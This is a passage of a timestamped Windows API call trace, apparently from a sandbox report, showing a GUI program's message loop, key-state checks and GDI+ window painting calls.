(nVirtKey=18) returned -127 [0165.396] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x105, wParam=0x1b, lParam=0xe0010001) returned 0x0 [0165.396] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.396] IsWindowUnicode (hWnd=0x102d8) returned 1 [0165.396] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.397] GetKeyState (nVirtKey=16) returned 0 [0165.397] GetKeyState (nVirtKey=17) returned 0 [0165.397] GetKeyState (nVirtKey=18) returned 1 [0165.397] TranslateMessage (lpMsg=0x11fed00) returned 1 [0165.397] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.397] GetKeyState (nVirtKey=16) returned 0 [0165.397] GetKeyState (nVirtKey=17) returned 0 [0165.397] GetKeyState (nVirtKey=18) returned 1 [0165.397] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x101, wParam=0x12, lParam=0xc0380001) returned 0x0 [0165.397] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.398] IsWindowUnicode (hWnd=0x102e2) returned 1 [0165.398] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.428] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.428] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.428] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.531] IsWindowUnicode (hWnd=0x102e2) returned 1 [0165.531] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.531] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.531] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.531] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.531] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.531] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.531] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.531] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.531] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.532] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.532] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.532] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.532] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.534] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.534] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.534] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.534] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.534] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.534] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.535] IsWindowUnicode (hWnd=0x102e2) returned 1 [0165.535] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.535] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.535] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.536] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.536] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.536] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.536] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.536] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.536] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.536] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.536] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.536] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.536] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.537] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.537] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.537] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.537] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.537] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.537] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.537] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.537] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.537] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.538] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.538] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.538] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.538] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.538] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.538] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.538] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.539] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.539] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.539] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.539] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.539] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.539] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.539] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.539] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.539] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.539] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.540] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.540] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.540] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.540] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.540] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.540] IsWindowUnicode (hWnd=0x102e2) returned 1 [0165.540] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.540] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.540] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.540] BeginPaint (in: hWnd=0x102e2, lpPaint=0x11fe790 | out: lpPaint=0x11fe790) returned 0xf0105ee [0165.541] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0165.541] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0165.541] CreateCompatibleDC (hdc=0xf0105ee) returned 0x51010800 [0165.541] GetObjectType (h=0xf0105ee) returned 0x3 [0165.541] CreateCompatibleBitmap (hdc=0xf0105ee, cx=1, cy=1) returned 0x34050816 [0165.541] GetDIBits (in: hdc=0xf0105ee, hbm=0x34050816, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0165.541] GetDIBits (in: hdc=0xf0105ee, hbm=0x34050816, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0165.541] DeleteObject (ho=0x34050816) returned 1 [0165.542] CreateDIBSection (in: hdc=0xf0105ee, lpbmi=0x11fe290, usage=0x0, ppvBits=0x11fe784, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe784) returned 0x1e050812 [0165.542] SelectObject (hdc=0x51010800, h=0x1e050812) returned 0x85000f [0165.542] GdipCreateFromHDC (hdc=0x51010800, graphics=0x11fe768) returned 0x0 [0165.542] GdipTranslateWorldTransform (graphics=0x6e1f390, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0165.542] GdipSetClipRectI (graphics=0x6e1f390, x=0, y=0, width=138, height=174, combineMode=0x0) returned 0x0 [0165.543] GdipCreateMatrix (matrix=0x11fe7f0) returned 0x0 [0165.543] GdipGetWorldTransform (graphics=0x6e1f390, matrix=0x6e19f70) returned 0x0 [0165.543] GdipIsMatrixIdentity (matrix=0x6e19f70, result=0x11fe808) returned 0x0 [0165.543] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0165.543] GdipGetMatrixElements (matrix=0x6e19f70, matrixOut=0x1593ed8) returned 0x0 [0165.543] LocalFree (hMem=0x1593ed8) returned 0x0 [0165.543] GdipDeleteMatrix (matrix=0x6e19f70) returned 0x0 [0165.543] GdipCreateRegion (region=0x11fe7f0) returned 0x0 [0165.543] GdipGetClip (graphics=0x6e1f390, region=0x6e19d10) returned 0x0 [0165.543] GdipIsInfiniteRegion (region=0x6e19d10, graphics=0x6e1f390, result=0x11fe7fc) returned 0x0 [0165.543] GdipSaveGraphics (graphics=0x6e1f390, state=0x11fe828) returned 0x0 [0165.543] GetWindowTextLengthW (hWnd=0x102e2) returned 0 [0165.543] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0165.543] GetSystemMetrics (nIndex=42) returned 0 [0165.543] GetWindowTextW (in: hWnd=0x102e2, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0165.543] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0165.543] GetClientRect (in: hWnd=0x102e2, lpRect=0x11fe7f0 | out: lpRect=0x11fe7f0) returned 1 [0165.543] GdipCreateRegion (region=0x11fe644) returned 0x0 [0165.543] GdipGetClip (graphics=0x6e1f390, region=0x6e19da0) returned 0x0 [0165.544] GdipCreateMatrix (matrix=0x11fe644) returned 0x0 [0165.544] GdipGetWorldTransform (graphics=0x6e1f390, matrix=0x6e19fa0) returned 0x0 [0165.544] GdipIsMatrixIdentity (matrix=0x6e19fa0, result=0x11fe65c) returned 0x0 [0165.544] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0165.544] GdipGetMatrixElements (matrix=0x6e19fa0, matrixOut=0x1593ed8) returned 0x0 [0165.544] LocalFree (hMem=0x1593ed8) returned 0x0 [0165.544] GdipCombineRegionRegion (region=0x6e19da0, region2=0x6e19d10, combineMode=0x1) returned 0x0 [0165.544] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0165.544] GdipGetMatrixElements (matrix=0x6e19fa0, matrixOut=0x1593ed8) returned 0x0 [0165.544] LocalFree (hMem=0x1593ed8) returned 0x0 [0165.544] GdipDeleteMatrix (matrix=0x6e19fa0) returned 0x0 [0165.544] GdipIsInfiniteRegion (region=0x6e19da0, graphics=0x6e1f390, result=0x11fe684) returned 0x0 [0165.544] GdipIsInfiniteRegion (region=0x6e19da0, graphics=0x6e1f390, result=0x11fe674) returned 0x0 [0165.544] GdipGetRegionHRgn (region=0x6e19da0, graphics=0x6e1f390, hRgn=0x11fe674) returned 0x0 [0165.544] GdipDeleteRegion (region=0x6e19da0) returned 0x0 [0165.544] GdipGetDC (graphics=0x6e1f390, hdc=0x11fe68c) returned 0x0 [0165.544] GetCurrentObject (hdc=0x51010800, type=0x1) returned 0xb00017 [0165.544] GetCurrentObject (hdc=0x51010800, type=0x2) returned 0x900010 [0165.544] GetCurrentObject (hdc=0x51010800, type=0x7) returned 0x1e050812 [0165.544] GetCurrentObject (hdc=0x51010800, type=0x6) returned 0x8a01c2 [0165.545] SaveDC (hdc=0x51010800) returned 1 [0165.545] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x17040825 [0165.545] GetClipRgn (hdc=0x51010800, hrgn=0x17040825) returned 0 [0165.545] SelectClipRgn (hdc=0x51010800, hrgn=0x1a040822) returned 2 [0165.545] DeleteObject (ho=0x17040825) returned 1 [0165.545] DeleteObject (ho=0x1a040822) returned 1 [0165.545] OffsetViewportOrgEx (in: hdc=0x51010800, x=0, y=0, lppt=0x333fa5c | out: lppt=0x333fa5c) returned 1 [0165.545] GetNearestColor (hdc=0x51010800, color=0x0) returned 0x0 [0165.545] CreateSolidBrush (color=0x0) returned 0x11100826 [0165.545] FillRect (hDC=0x51010800, lprc=0x11fe690, hbr=0x11100826) returned 1 [0165.547] DeleteObject (ho=0x11100826) returned 1 [0165.547] RestoreDC (hdc=0x51010800, nSavedDC=-1) returned 1 [0165.547] GdipReleaseDC (graphics=0x6e1f390, hdc=0x51010800) returned 0x0 [0165.547] GdipRestoreGraphics (graphics=0x6e1f390, state=0xfda70dbd) returned 0x0 [0165.547] GdipDeleteRegion (region=0x6e19d10) returned 0x0 [0165.547] GetWindowTextLengthW (hWnd=0x102e2) returned 0 [0165.547] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0165.547] GetSystemMetrics (nIndex=42) returned 0 [0165.547] GetWindowTextW (in: hWnd=0x102e2, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0165.547] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0165.547] GdipGetImageWidth (image=0x6e19248, width=0x11fe6c4) returned 0x0 [0165.547] GdipGetImageHeight (image=0x6e19248, height=0x11fe6c4) returned 0x0 [0165.547] GdipDrawImageRectI (graphics=0x6e1f390, image=0x6e19248, x=0, y=0, width=160, height=160) returned 0x0 [0165.551] GdipGetDC (graphics=0x6e1f390, hdc=0x11fe7e8) returned 0x0 [0165.551] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=138, cy=174, hdcSrc=0x51010800, x1=0, y1=0, rop=0xcc0020) returned 1 [0165.551] GdipReleaseDC (graphics=0x6e1f390, hdc=0x51010800) returned 0x0 [0165.551] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0165.551] SelectObject (hdc=0x51010800, h=0x85000f) returned 0x1e050812 [0165.551] DeleteDC (hdc=0x51010800) returned 1 [0165.551] GdipDeleteGraphics (graphics=0x6e1f390) returned 0x0 [0165.551] DeleteObject (ho=0x1e050812) returned 1 [0165.552] EndPaint (hWnd=0x102e2, lpPaint=0x11fe78c) returned 1 [0165.552] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.552] IsWindowUnicode (hWnd=0x102e4) returned 1 [0165.552] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.552] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.552] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.552] BeginPaint (in: hWnd=0x102e4, lpPaint=0x11fe790 | out: lpPaint=0x11fe790) returned 0xf0105ee [0165.553] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0165.553] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0165.553] CreateCompatibleDC (hdc=0xf0105ee) returned 0x38010816 [0165.553] GetObjectType (h=0xf0105ee) returned 0x3 [0165.553] CreateCompatibleBitmap (hdc=0xf0105ee, cx=1, cy=1) returned 0x21050812 [0165.553] GetDIBits (in: hdc=0xf0105ee, hbm=0x21050812, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0165.553] GetDIBits (in: hdc=0xf0105ee, hbm=0x21050812, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0165.553] DeleteObject (ho=0x21050812) returned 1 [0165.554] CreateDIBSection (in: hdc=0xf0105ee, lpbmi=0x11fe290, usage=0x0, ppvBits=0x11fe784, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe784) returned 0x52050800 [0165.554] SelectObject (hdc=0x38010816, h=0x52050800) returned 0x85000f [0165.554] GdipCreateFromHDC (hdc=0x38010816, graphics=0x11fe768) returned 0x0 [0165.554] GdipTranslateWorldTransform (graphics=0x6e1f390, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0165.554] GdipSetClipRectI (graphics=0x6e1f390, x=0, y=0, width=658, height=558, combineMode=0x0) returned 0x0 [0165.554] GdipCreateMatrix (matrix=0x11fe7f0) returned 0x0 [0165.554] GdipGetWorldTransform (graphics=0x6e1f390, matrix=0x6e19d80) returned 0x0 [0165.554] GdipIsMatrixIdentity (matrix=0x6e19d80, result=0x11fe808) returned 0x0 [0165.554] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0165.554] GdipGetMatrixElements (matrix=0x6e19d80, matrixOut=0x1593ed8) returned 0x0 [0165.555] LocalFree (hMem=0x1593ed8) returned 0x0 [0165.555] GdipDeleteMatrix (matrix=0x6e19d80) returned 0x0 [0165.555] GdipCreateRegion (region=0x11fe7f0) returned 0x0 [0165.555] GdipGetClip (graphics=0x6e1f390, region=0x6e19db0) returned 0x0 [0165.555] GdipIsInfiniteRegion (region=0x6e19db0, graphics=0x6e1f390, result=0x11fe7fc) returned 0x0 [0165.555] GdipSaveGraphics (graphics=0x6e1f390, state=0x11fe828) returned 0x0 [0165.555] GetWindowTextLengthW (hWnd=0x102e4) returned 0 [0165.555] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0165.555] GetSystemMetrics (nIndex=42) returned 0 [0165.555] GetWindowTextW (in: hWnd=0x102e4, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0165.555] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0165.555] GetClientRect (in: hWnd=0x102e4, lpRect=0x11fe7f0 | out: lpRect=0x11fe7f0) returned 1 [0165.555] GdipCreateRegion (region=0x11fe644) returned 0x0 [0165.555] GdipGetClip (graphics=0x6e1f390, region=0x6e19e40) returned 0x0 [0165.555] GdipCreateMatrix (matrix=0x11fe644) returned 0x0 [0165.555] GdipGetWorldTransform (graphics=0x6e1f390, matrix=0x6e19ed0) returned 0x0 [0165.555] GdipIsMatrixIdentity (matrix=0x6e19ed0, result=0x11fe65c) returned 0x0 [0165.555] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0165.555] GdipGetMatrixElements (matrix=0x6e19ed0, matrixOut=0x1593ed8) returned 0x0 [0165.555] LocalFree (hMem=0x1593ed8) returned 0x0 [0165.555] GdipCombineRegionRegion (region=0x6e19e40, region2=0x6e19db0, combineMode=0x1) returned 0x0 [0165.555] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593a78 [0165.556] GdipGetMatrixElements (matrix=0x6e19ed0, matrixOut=0x1593a78) returned 0x0 [0165.556] LocalFree (hMem=0x1593a78) returned 0x0 [0165.556] GdipDeleteMatrix (matrix=0x6e19ed0) returned 0x0 [0165.556] GdipIsInfiniteRegion (region=0x6e19e40, graphics=0x6e1f390, result=0x11fe684) returned 0x0 [0165.556] GdipIsInfiniteRegion (region=0x6e19e40, graphics=0x6e1f390, result=0x11fe674) returned 0x0 [0165.556] GdipGetRegionHRgn (region=0x6e19e40, graphics=0x6e1f390, hRgn=0x11fe674) returned 0x0 [0165.556] GdipDeleteRegion (region=0x6e19e40) returned 0x0 [0165.556] GdipGetDC (graphics=0x6e1f390, hdc=0x11fe68c) returned 0x0 [0165.556] GetCurrentObject (hdc=0x38010816, type=0x1) returned 0xb00017 [0165.556] GetCurrentObject (hdc=0x38010816, type=0x2) returned 0x900010 [0165.556] GetCurrentObject (hdc=0x38010816, type=0x7) returned 0x52050800 [0165.556] GetCurrentObject (hdc=0x38010816, type=0x6) returned 0x8a01c2 [0165.556] SaveDC (hdc=0x38010816) returned 1 [0165.556] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1b040822 [0165.556] GetClipRgn (hdc=0x38010816, hrgn=0x1b040822) returned 0 [0165.556] SelectClipRgn (hdc=0x38010816, hrgn=0x18040825) returned 2 [0165.556] DeleteObject (ho=0x1b040822) returned 1 [0165.556] DeleteObject (ho=0x18040825) returned 1 [0165.556] OffsetViewportOrgEx (in: hdc=0x38010816, x=0, y=0, lppt=0x3340f50 | out: lppt=0x3340f50) returned 1 [0165.556] GetNearestColor (hdc=0x38010816, color=0x0) returned 0x0 [0165.557] CreateSolidBrush (color=0x0) returned 0x12100826 [0165.557] FillRect (hDC=0x38010816, lprc=0x11fe690, hbr=0x12100826) returned 1 [0165.653] DeleteObject (ho=0x12100826) returned 1 [0165.653] RestoreDC (hdc=0x38010816, nSavedDC=-1) returned 1 [0165.653] GdipReleaseDC (graphics=0x6e1f390, hdc=0x38010816) returned 0x0 [0165.653] GdipRestoreGraphics (graphics=0x6e1f390, state=0xfda50dbd) returned 0x0 [0165.653] GdipDeleteRegion (region=0x6e19db0) returned 0x0 [0165.653] GetWindowTextLengthW (hWnd=0x102e4) returned 0 [0165.654] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0165.654] GetSystemMetrics (nIndex=42) returned 0 [0165.654] GetWindowTextW (in: hWnd=0x102e4, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0165.654] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0165.654] GdipGetImageWidth (image=0x6e19848, width=0x11fe6c4) returned 0x0 [0165.654] GdipGetImageHeight (image=0x6e19848, height=0x11fe6c4) returned 0x0 [0165.654] GdipDrawImageRectI (graphics=0x6e1f390, image=0x6e19848, x=0, y=0, width=768, height=516) returned 0x0 [0165.734] GdipGetDC (graphics=0x6e1f390, hdc=0x11fe7e8) returned 0x0 [0165.734] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=658, cy=558, hdcSrc=0x38010816, x1=0, y1=0, rop=0xcc0020) returned 1 [0165.735] GdipReleaseDC (graphics=0x6e1f390, hdc=0x38010816) returned 0x0 [0165.735] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0165.735] SelectObject (hdc=0x38010816, h=0x85000f) returned 0x52050800 [0165.736] DeleteDC (hdc=0x38010816) returned 1 [0165.736] GdipDeleteGraphics (graphics=0x6e1f390) returned 0x0 [0165.736] DeleteObject (ho=0x52050800) returned 1 [0165.747] EndPaint (hWnd=0x102e4, lpPaint=0x11fe78c) returned 1 [0165.747] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.747] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.747] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.747] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.747] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.750] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.751] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.751] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.751] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.751] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.752] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.752] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.752] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.752] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.752] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.752] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.753] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.753] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.753] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.753] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.753] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.753] IsWindowUnicode (hWnd=0x102ea) returned 1 [0165.753] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.753] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.753] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.754] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.754] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.754] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.754] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.754] 